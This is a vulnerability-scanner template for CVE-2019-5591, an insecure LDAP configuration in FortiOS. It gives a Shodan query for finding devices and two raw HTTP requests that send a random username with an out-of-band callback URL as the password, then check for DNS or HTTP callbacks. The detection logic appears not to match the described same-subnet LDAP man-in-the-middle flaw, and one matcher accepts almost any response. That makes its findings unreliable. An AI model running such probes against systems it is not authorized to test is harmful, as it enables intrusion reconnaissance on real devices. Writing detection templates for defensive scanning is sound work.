id: CVE-2019-5591

info:
  name: FortiOS - Insecure LDAP Configuration Detection
  author: ayewo
  severity: medium
  description: |
    The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions.
  impact: |
    Unauthenticated attackers can intercept sensitive information by impersonating LDAP servers within the same subnet.
  remediation: |
    Configure LDAP server settings properly and disable default configurations; update to the latest firmware version.
  reference:
    - https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
    - https://www.fortiguard.com/psirt/FG-IR-19-037
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-5591
    epss-score: 0.50553
    epss-percentile: 0.97897
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortigate
    shodan-query: 'cpe:"cpe:2.3:o:fortinet:fortios"'
  tags: cve,cve2019,fortinet,ldap,kev,vkev,oast

variables:
  username: "{{rand_text_alpha(10)}}"
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /logincheck HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain;charset=UTF-8

        ajax=1&username={{username}}&secretkey={{interactsh-url}}

    matchers-condition: and
    matchers:
      # First response must be the FortiOS login form.
      - type: word
        part: body_1
        words:
          - 'name="username"'
          - 'name="secretkey"'
        condition: and

      - type: status
        status:
          - 200

      # Second response must carry one of the logincheck result codes.
      - type: dsl
        dsl:
          - contains(body_2, "0")
          - contains(body_2, "1")
          - contains(body_2, "2")
        condition: or

      # Reject responses that merely echo the submitted form body.
      - type: word
        part: body_2
        words:
          - "ajax=1&username="
        condition: or
        negative: true

      # The submitted secretkey (an OAST callback URL) must have been resolved or fetched out-of-band.
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
# digest: 4b0a00483046022100e1ae86b880c76d6a5506197fe2c8afabee73e99571f9ddee78b88b869d2c1a560221008415800d788ff06b631233c2b9c0b0267d258f65040da99a130d2f0bfbc09e86:922c64590222798bb761d5b6d8e72950